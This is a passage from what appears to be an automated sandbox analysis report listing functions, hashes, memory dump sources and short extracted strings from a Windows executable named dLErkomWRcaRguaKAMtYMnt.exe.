Opcode ID: bfe7b4cd8ff35ea617184fd4675237bf944b08a36caed1b0b6643eb09c107b47
Instruction ID: 4b08a0240c354d60ea7f2685187931f3e6f6a559478b419d59bc73b30aab1ee9
Opcode Fuzzy Hash: bfe7b4cd8ff35ea617184fd4675237bf944b08a36caed1b0b6643eb09c107b47
Instruction Fuzzy Hash: 51F0C232D4C6895FE345FB6898592EDBFA0EF44240F4500F6D819C71D2EB296989C745

Function 00007FF848F311D7 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.3627514372.00007FF848F25000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F25000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_7ff848f25000_dLErkomWRcaRguaKAMtYMnt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 87d51f987daa6ef962eff496e960d79ea66089ab7b93e8a0b347ed75e5a96867
Instruction ID: 1b2453407cc6fcc2b6ba8178fc4e141137862d73f0d34a5f04e1dff51912a09a
Opcode Fuzzy Hash: 87d51f987daa6ef962eff496e960d79ea66089ab7b93e8a0b347ed75e5a96867
Instruction Fuzzy Hash: 13F0903274C90A8FE315B74CE8517E52292DBD4360F45063AD85DC37D5DE6DE9C28340

Function 00007FF848F2BC42 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.3627514372.00007FF848F25000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F25000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_7ff848f25000_dLErkomWRcaRguaKAMtYMnt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 75d8e091c144f0845cfbf515f3f7243b75e67fc0d149a30aa3ff6bf72ae8daec
Instruction ID: 6bcafcfc2a2cb5f5bc4dba5e29c724fe2181dbc901a9b2216dd157c27a044d22
Opcode Fuzzy Hash: 75d8e091c144f0845cfbf515f3f7243b75e67fc0d149a30aa3ff6bf72ae8daec
Instruction Fuzzy Hash: 25F0903189D3C59FD303AB7098155A53FB4EF43244F1900E7E446CB0E2CB2D1A1AC762

Function 00007FF848F20528 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.3627514372.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_7ff848f20000_dLErkomWRcaRguaKAMtYMnt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4af236b83d218a059178c16575a36280548495e988f0cd4033f7cab12cb33780
Instruction ID: ccbe1c756f03d65e4ff325ac8f125c2b8410a59df8486ca12865241d2ee5ec7d
Opcode Fuzzy Hash: 4af236b83d218a059178c16575a36280548495e988f0cd4033f7cab12cb33780
Instruction Fuzzy Hash: F2F0583080D64E8FDB95EF68A4012EA77A0FF55344F04013AE40CC61C2DB3AA5A0CB98

Function 00007FF848F21258 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.3627514372.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_7ff848f20000_dLErkomWRcaRguaKAMtYMnt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 25d49cf9c7993ef37169e1c4daf45a2946ff51e25cfff5ed24a9321c4a340899
Instruction ID: e0bf1a619bcf427c1836e82c1d9587dc8327f74f13fb9aa1a0ee01be86462422
Opcode Fuzzy Hash: 25d49cf9c7993ef37169e1c4daf45a2946ff51e25cfff5ed24a9321c4a340899
Instruction Fuzzy Hash: 1BF08C3080D64D8FDB98FF68E8422A57BA0FFA5340F040129E40CC35C1DB76A5A4CB84

Function 00007FF848F25D78 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.3627514372.00007FF848F25000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F25000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_7ff848f25000_dLErkomWRcaRguaKAMtYMnt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: af9cbef32b9a8674beb5515610a38f0cad35934a9f88df3c80b99c208b93fa46
Instruction ID: 168b987339a9e14e04e477f87a347648ad6328a1aa7af9e3dc5a8e2d04089627
Opcode Fuzzy Hash: af9cbef32b9a8674beb5515610a38f0cad35934a9f88df3c80b99c208b93fa46
Instruction Fuzzy Hash: 35F05E30819A0DDFEB41FF68A449AFA7BE0FF14344F1045B6E80DC2191EB34A190CB84

Function 00007FF848F21F15 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.3627514372.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_7ff848f20000_dLErkomWRcaRguaKAMtYMnt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a8da7bd04c52ad97392030a11ef0b79d40eb92c269b6125bcb56d6d9165a0193
Instruction ID: 4f59d68f7131ba56b4261dd1179c48887fe6673bc26f67a4a4e841a9be399fac
Opcode Fuzzy Hash: a8da7bd04c52ad97392030a11ef0b79d40eb92c269b6125bcb56d6d9165a0193
Instruction Fuzzy Hash: 76E09231C4D78E4FD715BF60591A1E97F60FF45300F0905BAE418860C2E769A168C745

Function 00007FF848F21C19 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.3627514372.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_7ff848f20000_dLErkomWRcaRguaKAMtYMnt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c22a23e1247c00fb1d6ccd679e6776e72c2f901f056b29cd182176dfff739317
Instruction ID: ff096f9d6e326beeb77687be9bf6e5f62490e2c2e624435c02b3ff162a353416
Opcode Fuzzy Hash: c22a23e1247c00fb1d6ccd679e6776e72c2f901f056b29cd182176dfff739317
Instruction Fuzzy Hash: 27E0ED3188E3CD8FD716BB2098591E97F70FF02200F4901BAE448C60D3EB69A558C31A

Function 00007FF848F20530 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.3627514372.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_7ff848f20000_dLErkomWRcaRguaKAMtYMnt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aed17da0d5f8129411324e1d08c13869f47827f4f3c38000bdf2dc80eb84ac87
Instruction ID: b405a98fb43947383b2e47756e1bea8d1ff47b46d2cbab3f236ed9b18f36ef6a
Opcode Fuzzy Hash: aed17da0d5f8129411324e1d08c13869f47827f4f3c38000bdf2dc80eb84ac87
Instruction Fuzzy Hash: 5FF0393080964D8FDB94EF54E4016AA77A0FF55344F000139E41CD25C0DB36A5A0CB98

Function 00007FF848F22536 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.3627514372.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_7ff848f20000_dLErkomWRcaRguaKAMtYMnt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 549136bceda1c2342a298d823bde8dc39827a0c2d6051a9d26b6f5331a1ea349
Instruction ID: d16032ef57f9feef9bff991da57a5f99e373b9b4f0bd64efe10181496b11f648
Opcode Fuzzy Hash: 549136bceda1c2342a298d823bde8dc39827a0c2d6051a9d26b6f5331a1ea349
Instruction Fuzzy Hash: E4F09871D1485E8EDBA4EB28C495BA9B7B1FB58340F5086E6800DE3246DB75AEC58F80

Function 00007FF848F28953 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.3627514372.00007FF848F25000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F25000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_7ff848f25000_dLErkomWRcaRguaKAMtYMnt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f9e6752c5bed0063122b97c3a57d326783e805f4c00a87944c970fe525fe39ed
Instruction ID: 414872d5a605575ff005eaaaa7a661b47f3a16148af4a9f6b9b5c54d2a0bfbf6
Opcode Fuzzy Hash: f9e6752c5bed0063122b97c3a57d326783e805f4c00a87944c970fe525fe39ed
Instruction Fuzzy Hash: 4BF03070D1891D8FD790FB2CD8457A8B7F1FF54244F5041A5C00DD3292DF3529818B00

Function 00007FF848F21B4D Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.3627514372.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_7ff848f20000_dLErkomWRcaRguaKAMtYMnt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6531c7047629796a7f6a7192d7312461f58d68bd19bc76212192d750625094a
Instruction ID: 3ec5bbc12fe9cade8fcf0ae374b7cbd76ed6a7ffb5e4795f788e59ea23778a87
Opcode Fuzzy Hash: b6531c7047629796a7f6a7192d7312461f58d68bd19bc76212192d750625094a
Instruction Fuzzy Hash: 8CE0223280E78D4FD711BF2069492E97F60FF41301F0401AAD008820C3EB6AA218C346

Function 00007FF848F36820 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.3627514372.00007FF848F25000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F25000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_7ff848f25000_dLErkomWRcaRguaKAMtYMnt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 41f3e595dd27ae253e39157275f171253659fb33b37b34867e850a923f20e048
Instruction ID: 3ab3bbbc069f6455f80d92b34943d693bd2b6c903394e5fd8d65681a4dc1dafb
Opcode Fuzzy Hash: 41f3e595dd27ae253e39157275f171253659fb33b37b34867e850a923f20e048
Instruction Fuzzy Hash: 93F05F70D1861D8FDBACDF58C890AECB7B1BB88340F20016E900EA7381CB342A40CF04

Function 00007FF848F20C61 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.3627514372.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_7ff848f20000_dLErkomWRcaRguaKAMtYMnt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3504053fd9e0af93bbe58c238fdaec3d0fb5fd1187f983bc799d77638e787b64
Instruction ID: b2bed1799183a0b8719a436bca5f7a74c0b8d6b9467dd7a52fdbe811edd62b1d
Opcode Fuzzy Hash: 3504053fd9e0af93bbe58c238fdaec3d0fb5fd1187f983bc799d77638e787b64
Instruction Fuzzy Hash: B5E08C31E0652D4EDB40EB58E8013EEB770FF85301F8000B1C10CE3181CF3829408B80

Function 00007FF848F2D82B Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.3627514372.00007FF848F25000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F25000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_7ff848f25000_dLErkomWRcaRguaKAMtYMnt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8233bc23584a297bf5f96d7e4bd2fb70f7fd9aac8fee6d1b38645daa7cc4f470
Instruction ID: c8d8f66eb00f6e1952a882e621e038a7528b2c529f4a902a8342213ebbe0e0d8
Opcode Fuzzy Hash: 8233bc23584a297bf5f96d7e4bd2fb70f7fd9aac8fee6d1b38645daa7cc4f470
Instruction Fuzzy Hash: 69D0C930E0D50F8EF1787701602067A51A09FC1380F74407DC09F418C2CF1FB501A609

Function 00007FF848F4A440 Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.3627514372.00007FF848F25000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F25000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_7ff848f25000_dLErkomWRcaRguaKAMtYMnt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5c0cafd48c4587b235bde784b9e76de60af66142a67cd5114ea223345d3db612
Instruction ID: 2cbccae3ac48cc06fdd98111906096104a93dd02b0f47e869b933eb565afd358
Opcode Fuzzy Hash: 5c0cafd48c4587b235bde784b9e76de60af66142a67cd5114ea223345d3db612
Instruction Fuzzy Hash: 94B092A2C0E6C15FD2574374182A0242EA02B2390071904EFC0848A0FBA6284C8A8796

Function 00007FF848F32C7D Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.3627514372.00007FF848F25000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F25000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_7ff848f25000_dLErkomWRcaRguaKAMtYMnt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 04458ed876806afe2712ab7ba2853cc9f958ca8ac2697c143af428f08f8bb896
Instruction ID: b727dbf8d17b2cd160a6816523f6a04bd033f9ee1fd791421b8b3c1fa5779531
Opcode Fuzzy Hash: 04458ed876806afe2712ab7ba2853cc9f958ca8ac2697c143af428f08f8bb896
Instruction Fuzzy Hash: DAB09930C8C00B8EF82033C828820BC00003F883F2FB00232C00EC00C2AE2E208020AA

Function 00007FF848F2C951 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.3627514372.00007FF848F25000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F25000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_7ff848f25000_dLErkomWRcaRguaKAMtYMnt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 300340fab69ce3b27e0f27a8c3412c5addfc5bd25d51e1d8d81b9961df5788e2
Instruction ID: e88660140e8cdc10ca87a43e2d1262e2bde037d920f5bff15d9c70a874bd4562
Opcode Fuzzy Hash: 300340fab69ce3b27e0f27a8c3412c5addfc5bd25d51e1d8d81b9961df5788e2
Instruction Fuzzy Hash: 02B09234E0C2038AE12033A0288403C10410B482C5F200530914A461D3EE4A384011DD

Function 00007FF848F3579B Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.3627514372.00007FF848F25000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F25000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_7ff848f25000_dLErkomWRcaRguaKAMtYMnt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e690abc1312d7ab5bf9ca4a8e769709d32253e1b5d6ae338b7b81110f0bb8bff
Instruction ID: 20bd353a1aa87fcaab9c2a23777a4879e8dc630789bbc7b95e8957c13e0d3fe4
Opcode Fuzzy Hash: e690abc1312d7ab5bf9ca4a8e769709d32253e1b5d6ae338b7b81110f0bb8bff
Instruction Fuzzy Hash: 2EC09B3040E3818FD3127734C4111683BA45F47258F1509F7D4548A1D7C6297415D759

Non-executed Functions

Function 00007FF848F206FA Relevance: 15.2, Strings: 12, Instructions: 190COMMON

Download Yara Rule

Strings

=N_^, xrefs: 00007FF848F20701
|H, xrefs: 00007FF848F207E9
N_^U, xrefs: 00007FF848F206FA
(}H, xrefs: 00007FF848F20829
?N_I, xrefs: 00007FF848F20804
8}H, xrefs: 00007FF848F20839
H}H, xrefs: 00007FF848F20849
{H, xrefs: 00007FF848F207D9
`~H, xrefs: 00007FF848F20859
N_^g, xrefs: 00007FF848F2077A
N_^f, xrefs: 00007FF848F20772
N_^X, xrefs: 00007FF848F20712

Memory Dump Source

Source File: 0000001D.00000002.3627514372.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_7ff848f20000_dLErkomWRcaRguaKAMtYMnt.jbxd

Similarity

API ID:
String ID: (}H$8}H$=N_^$?N_I$H}H$N_^U$N_^X$N_^f$N_^g$`~H${H$|H
API String ID: 0-2416682933
Opcode ID: 216282af4b726a1e9a85dceb7807920309846c93526734408ffdc30366ec60d6
Instruction ID: 1b933e9417d8f03bd50c10ca2b46f80563ce8af1a20849c0934c461b88d8dafc
Opcode Fuzzy Hash: 216282af4b726a1e9a85dceb7807920309846c93526734408ffdc30366ec60d6
Instruction Fuzzy Hash: 38510873E0E5864FE21677AC7C161F96B90FF91BA1F5901B7C5488B0CBEA29980583C6

Function 00007FF848F206E0 Relevance: 14.0, Strings: 11, Instructions: 210COMMON

Download Yara Rule

Strings

=N_^, xrefs: 00007FF848F20701
|H, xrefs: 00007FF848F207E9
(}H, xrefs: 00007FF848F20829
?N_I, xrefs: 00007FF848F20804
8}H, xrefs: 00007FF848F20839
H}H, xrefs: 00007FF848F20849
{H, xrefs: 00007FF848F207D9
`~H, xrefs: 00007FF848F20859
N_^g, xrefs: 00007FF848F2077A
N_^f, xrefs: 00007FF848F20772
N_^X, xrefs: 00007FF848F20712

Memory Dump Source

Source File: 0000001D.00000002.3627514372.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_7ff848f20000_dLErkomWRcaRguaKAMtYMnt.jbxd

Similarity

API ID:
String ID: (}H$8}H$=N_^$?N_I$H}H$N_^X$N_^f$N_^g$`~H${H$|H
API String ID: 0-2554485456
Opcode ID: fe3779fb8f51b1bf886a16c8759b82c15019f1fade86d34212de87c5042d6a1e
Instruction ID: f138f8412351a133c2cac24b8dcc2fe2c6da2425ace617ce571dae1ea0f281c8
Opcode Fuzzy Hash: fe3779fb8f51b1bf886a16c8759b82c15019f1fade86d34212de87c5042d6a1e
Instruction Fuzzy Hash: 62511473E0E5864FE21677AC7C161FA6B90FFD16A1F5801B7C5488B0CBEA29980583C9

Function 00007FF848F206A5 Relevance: 14.0, Strings: 11, Instructions: 205COMMON

Download Yara Rule

Strings

N_^J, xrefs: 00007FF848F206C2
|H, xrefs: 00007FF848F207E9
(}H, xrefs: 00007FF848F20829
?N_I, xrefs: 00007FF848F20804
N_^K, xrefs: 00007FF848F206C9
8}H, xrefs: 00007FF848F20839
H}H, xrefs: 00007FF848F20849
{H, xrefs: 00007FF848F207D9
`~H, xrefs: 00007FF848F20859
N_^g, xrefs: 00007FF848F2077A
N_^f, xrefs: 00007FF848F20772

Memory Dump Source

Source File: 0000001D.00000002.3627514372.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_7ff848f20000_dLErkomWRcaRguaKAMtYMnt.jbxd

Similarity

API ID:
String ID: (}H$8}H$?N_I$H}H$N_^J$N_^K$N_^f$N_^g$`~H${H$|H
API String ID: 0-3450144878
Opcode ID: d6df8bc115383d1355066fab4c46df49a9f36f01f3e1e00e02ae27bfb573bd36
Instruction ID: 867cb232275cc450bc9289828c4298061c1c6647905e123ecd664f9a53ac47a7
Opcode Fuzzy Hash: d6df8bc115383d1355066fab4c46df49a9f36f01f3e1e00e02ae27bfb573bd36
Instruction Fuzzy Hash: 65512573E0E5964FE21577AC7C121F96B90FFD1BA1F2501B7C5488B0CBEA29980A83C5

Function 00007FF848F20F70 Relevance: 6.5, Strings: 5, Instructions: 235COMMON

Download Yara Rule

Strings

8XH, xrefs: 00007FF848F2377B
8XH, xrefs: 00007FF848F23800
8XH, xrefs: 00007FF848F2372F
8XH, xrefs: 00007FF848F236A2
8XH, xrefs: 00007FF848F2384F

Memory Dump Source

Source File: 0000001D.00000002.3627514372.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_7ff848f20000_dLErkomWRcaRguaKAMtYMnt.jbxd

Similarity

API ID:
String ID: 8XH$8XH$8XH$8XH$8XH
API String ID: 0-2822012881
Opcode ID: 3138e96b2804ef180743df0a40d886486d67240a8a02d81f3eee40aaea314b63
Instruction ID: 151ed8b4b2d7f82129fffb1aa895540e77c12c5cdd73da08b9e121f2c21909e6
Opcode Fuzzy Hash: 3138e96b2804ef180743df0a40d886486d67240a8a02d81f3eee40aaea314b63
Instruction Fuzzy Hash: 849131B0D196498FCB58EF68D490AEDB7B2FF58301F600179D00AA7291CB39A841CF55

Analysis Process: dLErkomWRcaRguaKAMtYMnt.exePID: 5708, Parent PID: 1068COMMON

Executed Functions

Function 00007FF848F30F80 Relevance: 2.6, Strings: 1, Instructions: 1360COMMON

Download Yara Rule

Strings

8XH, xrefs: 00007FF848F341A7

Memory Dump Source

Source File: 0000001E.00000002.2433455222.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ff848f30000_dLErkomWRcaRguaKAMtYMnt.jbxd

Similarity

API ID:
String ID: 8XH
API String ID: 0-955928957
Opcode ID: de79c0340bf89b5a17df1036ce3582ddbf7502cd2238b2869b921924d262c09b
Instruction ID: c8c363a0cb9bd79f0537f20e0a8a0a92b430c54de2af6288f7bab5d06700a581
Opcode Fuzzy Hash: de79c0340bf89b5a17df1036ce3582ddbf7502cd2238b2869b921924d262c09b
Instruction Fuzzy Hash: C5C2B470D196298FDBA8EF18C8947A9B7B1FF68341F5041EAD40DE7291CB34AA81CF54

Function 00007FF848F33239 Relevance: 14.1, Strings: 11, Instructions: 310COMMON

Download Yara Rule

Strings

8XH, xrefs: 00007FF848F333DE
xMH, xrefs: 00007FF848F332BC
8XH, xrefs: 00007FF848F335A6
8XH, xrefs: 00007FF848F332DE
8XH, xrefs: 00007FF848F33302
8XH, xrefs: 00007FF848F3334C
8XH, xrefs: 00007FF848F33370
8XH, xrefs: 00007FF848F3344A
8XH, xrefs: 00007FF848F333BA
8XH, xrefs: 00007FF848F33294
8XH, xrefs: 00007FF848F33427

Memory Dump Source

Source File: 0000001E.00000002.2433455222.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ff848f30000_dLErkomWRcaRguaKAMtYMnt.jbxd

Similarity

API ID:
String ID: 8XH$8XH$8XH$8XH$8XH$8XH$8XH$8XH$8XH$8XH$xMH
API String ID: 0-677258541
Opcode ID: 99016016a4c23b34e1796fffe24007537922a61dc894f01210d713608d539657
Instruction ID: a60974cef19374fe75a7c1d6820b1c5b5b343c695fe17bb4d97c9b696ae80e8c
Opcode Fuzzy Hash: 99016016a4c23b34e1796fffe24007537922a61dc894f01210d713608d539657
Instruction Fuzzy Hash: 54B14A31D19A5A9FEB98EB68D8657B8B7A1FF54340F0441BAC00DE72D2CF386984CB05

Function 00007FF848F30F8D Relevance: 13.8, Strings: 11, Instructions: 5COMMON

Download Yara Rule

Strings

8XH, xrefs: 00007FF848F333DE
xMH, xrefs: 00007FF848F332BC
8XH, xrefs: 00007FF848F335A6
8XH, xrefs: 00007FF848F332DE
8XH, xrefs: 00007FF848F33302
8XH, xrefs: 00007FF848F3334C
8XH, xrefs: 00007FF848F33370
8XH, xrefs: 00007FF848F3344A
8XH, xrefs: 00007FF848F333BA
8XH, xrefs: 00007FF848F33294
8XH, xrefs: 00007FF848F33427

Memory Dump Source

Source File: 0000001E.00000002.2433455222.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ff848f30000_dLErkomWRcaRguaKAMtYMnt.jbxd

Similarity

API ID:
String ID: 8XH$8XH$8XH$8XH$8XH$8XH$8XH$8XH$8XH$8XH$xMH
API String ID: 0-677258541
Opcode ID: a1314a694e1df31dd53e27e05b489d0bec5185cc533485f47ece7707f0c14008
Instruction ID: 46e6a6cd507a8fb32d46ffb86a843a5f1e2a9619fac4c485b480f1445da358f5
Opcode Fuzzy Hash: a1314a694e1df31dd53e27e05b489d0bec5185cc533485f47ece7707f0c14008
Instruction Fuzzy Hash: 43A0021D51A09254D9413668A0110ED6B605E53359B0C62B2D28C0C4534D0D14876158

Function 00007FF848F34DB0 Relevance: 9.1, Strings: 7, Instructions: 336COMMON

Download Yara Rule

Strings

8XH, xrefs: 00007FF848F34EAC
8XH, xrefs: 00007FF848F35018
8XH, xrefs: 00007FF848F3504E
8XH, xrefs: 00007FF848F34DEC
8XH, xrefs: 00007FF848F350D4
8XH, xrefs: 00007FF848F34E42
8XH, xrefs: 00007FF848F34FCE

Memory Dump Source

Source File: 0000001E.00000002.2433455222.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ff848f30000_dLErkomWRcaRguaKAMtYMnt.jbxd

Similarity

API ID:
String ID: 8XH$8XH$8XH$8XH$8XH$8XH$8XH
API String ID: 0-2696229484
Opcode ID: fd80b07a0f44b52794899482c9f67ac9e453130f5a566409a9fb12250a8d97f3
Instruction ID: a63e3c9214eb29cdc1ba8ee54d591f339039d48cccec6a9b0bff5a9e84c1e8e3
Opcode Fuzzy Hash: fd80b07a0f44b52794899482c9f67ac9e453130f5a566409a9fb12250a8d97f3
Instruction Fuzzy Hash: 95C12671D1965ACFDBA8EBA8C4506BDB7B1FF69341F1400BAD00DA3292CB396880CB55

Function 00007FF848F30F98 Relevance: 9.0, Strings: 7, Instructions: 234COMMON

Download Yara Rule

Strings

8XH, xrefs: 00007FF848F333DE
8XH, xrefs: 00007FF848F335A6
8XH, xrefs: 00007FF848F33302
8XH, xrefs: 00007FF848F334FC
8XH, xrefs: 00007FF848F33370
8XH, xrefs: 00007FF848F3344A
8XH, xrefs: 00007FF848F33294

Memory Dump Source

Source File: 0000001E.00000002.2433455222.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ff848f30000_dLErkomWRcaRguaKAMtYMnt.jbxd

Similarity

API ID:
String ID: 8XH$8XH$8XH$8XH$8XH$8XH$8XH
API String ID: 0-2696229484
Opcode ID: 016f0cd9bf3ae5178cafe1c89f9c2fbae50d3982c0c68f4ee60477c7221551f4
Instruction ID: 3396bb3a226ec48b0f18e43517904e357b1532a0ba55d58812036bd1d8bfc0fb
Opcode Fuzzy Hash: 016f0cd9bf3ae5178cafe1c89f9c2fbae50d3982c0c68f4ee60477c7221551f4
Instruction Fuzzy Hash: DB912571D196599FEB98EB68D4957ACBBB1FF18340F0441BED00AA32D2CB786884CB54

Function 00007FF848F30F88 Relevance: 6.6, Strings: 5, Instructions: 382COMMON

Download Yara Rule

Strings

{, xrefs: 00007FF848F351E1
[, xrefs: 00007FF848F35451
", xrefs: 00007FF848F35628
-, xrefs: 00007FF848F35723
", xrefs: 00007FF848F355E7

Memory Dump Source

Source File: 0000001E.00000002.2433455222.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ff848f30000_dLErkomWRcaRguaKAMtYMnt.jbxd

Similarity

API ID:
String ID: "$"$-$[${
API String ID: 0-3019564589
Opcode ID: cc27fa3f8a6e7f5a8c2be741bba01d6971109a83986592b2205a0adcc468f46d
Instruction ID: 4dff04c960fd73983dd1d11b088c2dc98b0eda2a3cde9ae08a62ab739127a6dc
Opcode Fuzzy Hash: cc27fa3f8a6e7f5a8c2be741bba01d6971109a83986592b2205a0adcc468f46d
Instruction Fuzzy Hash: CEE1D370D196298FDBA8DF28C8947EDB7B1FF98341F5045AAD00DA7281DB386A85CF44

Function 00007FF848F37C89 Relevance: 1.6, Strings: 1, Instructions: 335COMMON

Download Yara Rule

Strings

8XH, xrefs: 00007FF848F37CC9

Memory Dump Source

Source File: 0000001E.00000002.2433455222.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ff848f30000_dLErkomWRcaRguaKAMtYMnt.jbxd

Similarity

API ID:
String ID: 8XH
API String ID: 0-955928957
Opcode ID: 4ddcd4f818249fc357e70febc79ed5fcff6bf77ad471ab3bef22defbd3c8896f
Instruction ID: e646dfb83a00f7ea0765e6912593bbb7dd817a335ee3c29fd02c19b146d2fd1d
Opcode Fuzzy Hash: 4ddcd4f818249fc357e70febc79ed5fcff6bf77ad471ab3bef22defbd3c8896f
Instruction Fuzzy Hash: 03C13670D2CA19CFEB95EB6884856BDB7A1FF59341F90417AC00DD32C6CB38A886DB44

Function 00007FF848F305D8 Relevance: 1.5, Strings: 1, Instructions: 284COMMON

Download Yara Rule

Strings

X}H, xrefs: 00007FF848F31337

Memory Dump Source

